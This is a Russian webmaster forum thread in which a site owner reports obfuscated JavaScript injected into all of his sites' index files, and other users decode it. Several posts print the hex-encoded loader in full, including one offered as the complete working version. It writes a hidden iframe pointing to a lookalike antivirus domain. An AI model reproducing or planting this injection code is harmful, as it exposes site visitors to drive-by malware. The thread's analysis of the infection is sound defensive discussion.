- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Совершенно случайно обнаружил код на всех своих сайтах такого плана:
<script>function v481294eb2b1f5(v481294eb2b9a7){ function v481294eb2c177 () {var v481294eb2c947=16; return v481294eb2c947;} return(parseInt(v481294eb2b9a7,v481294eb2c177()));}function v481294eb2d11a(v481294eb2d8e8){ var v481294eb2e0b7='';for(v481294eb2e886=0; v481294eb2e886<v481294eb2d8e8.length; v481294eb2e886+=2){ v481294eb2e0b7+=(String.fromCharCode(v484564354eb2b1f5(v481294eb2d8e8.substr(v481294eb2e886, 2))));}return v481294eb2e0b7;} document.write(v481294eb2d11a('3C69667456JHGJ78KJH762323636316227207372633D27687474703A2F2F6B617373706572736B796C6162C2F696E6465782E706870272077696474683D343436206865696768743D323130207374796C653D27'));</script>
Для чего этот код кто-то вставил во все индексные файлы? Понятно что пароли на ftp надо менять, но все же интересно?
Причем это не вирус т.к. только на моих ftp, доступы к которым я иногда даю кому-либо есть такой код, на других ftp не моих куда я доступы не даю этого кода нет...
вроде код скрипта не полный, т.к. не хватает функции v484564354eb2b1f5
а так, по всей видимости, должен прописывать не видимый ифрэйм
вирусня, подгружающяя ченить посетителям сайта
Скрипт не может работать, он не полный, или с ошибкой.
Но если заменить несущуствующую функцию существующей, то выводит такой код:
Вобщем, или ифрейм, или картинку вставлять должен с некого src='http://kassperskylab[Что-то там непонятное]'.
kaspersylab скорее всего поддомен какогонить левого домена
Такой может ничего, ибо с ошибкой. Возможно нехватающая фунцкия в зараженном файле в другом месте прописана?!!!!
В общем, троянчег полюбому... Чтоже ещё хорошего можно ожидать от неожиданно появившегося iframe??
Вот полный и правильный код, проверьте кто может
<script>function v4812d1a35ab7b(v4812d1a35b34e){ function v4812d1a35bb1a () {return 16;} return(parseInt(v4812d1a35b34e,v4812d1a35bb1a()));}function v4812d1a35d28e(v4812d1a35da74){ function v4812d1a35f1ea () {return 2;} var v4812d1a35e228='';for(v4812d1a35e9f9=0; v4812d1a35e9f9<v4812d1a35da74.length; v4812d1a35e9f9+=v4812d1a35f1ea()){ v4812d1a35e228+=(String.fromCharCode(v4812d1a35ab7b(v4812d1a35da74.substr(v4812d1a35e9f9, v4812d1a35f1ea()))));}return v4812d1a35e228;} document.write(v4812d1a35d28e('3C696672616D65206E616D653D273439396131656465646427207372633D27687474703A2F2F6B617373706572736B796C6162732E636E2F73706C2F696E6465782E706870272077696474683D363938206865696768743D343138207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>а на каком хостинге сайт, если не секрет?
вот что выводит скрипт
ACCESS DENIED
The requested URL could not be retrieved
While trying to retrive the URL: http://kassperskylabs.cn/spl/index.php
The folowing error was encountered:
The requested object is forbidden.
Generated Sat Apr 26 19:00:37 2008 by Kaspersky Internet Security 7.0